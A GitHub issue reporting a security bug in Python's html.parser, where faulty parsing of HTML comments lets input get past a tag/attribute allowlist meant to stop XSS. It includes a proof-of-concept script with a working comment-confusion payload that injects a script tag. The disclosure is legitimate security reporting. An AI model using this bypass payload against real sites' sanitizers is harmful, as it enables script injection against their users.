Skip to content

XSS in html.parser library #102555

Open
Open
@Retr02332

Description

@Retr02332

Description

The library html.parser allows an attacker to bypass any whitelist of HTML tags and attributes that seek to mitigate XSS. This is possible because the application does not correctly parse the HTML comments in the user input.

Vulnerability

This vulnerability occurs because the application does not correctly parse the HTML comments in the user input.

Exploitation

In this scenario a developer parses the HTML entered by the user to validate it with an allowlist of tags and attributes. This is to prevent XSS attacks. In this case we see how we can bypass a security check of this type, thanks to the fact that the parser does not parse the HTML comments properly.

poc.py

from html.parser import HTMLParser
from html.entities import name2codepoint

class MyHTMLParser(HTMLParser):
    def handle_starttag(self, tag, attrs):
        print("Start tag:", tag)
        # Whitelist Tags
        print("Invalid tag:",tag != "h1")
        for attr in attrs:
            # Whitelist Attr
            print("attr:", attr)
            print("Invalid attr:",attr != "alt")

    def handle_endtag(self, tag):
        print("End tag  :", tag)

    def handle_data(self, data):
        print("Data     :", data)

    def handle_comment(self, data):
        print("Comment  :", data)

    def handle_entityref(self, name):
        c = chr(name2codepoint[name])
        print("Named ent:", c)

    def handle_charref(self, name):
        if name.startswith('x'):
            c = chr(int(name[1:], 16))
        else:
            c = chr(int(name))
        print("Num ent  :", c)

    def handle_decl(self, data):
        print("Decl     :", data)

parser = MyHTMLParser()
parser.feed('<!--!> <h1 value="--!><script>alert(document.domain)</script>')
# HTML is safe, we can proceed

Evidence of exploitation

python-exploit

Expected behavior

safe-python

System Information

  • CPython versions tested on: Python 3.10.8
  • Operating system and architecture: GNU/Linux x86_64

Linked PRs

Metadata

Metadata

Assignees

Labels

stdlibPython modules in the Lib dirtype-securityA security issue

Projects

Status

Todo

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions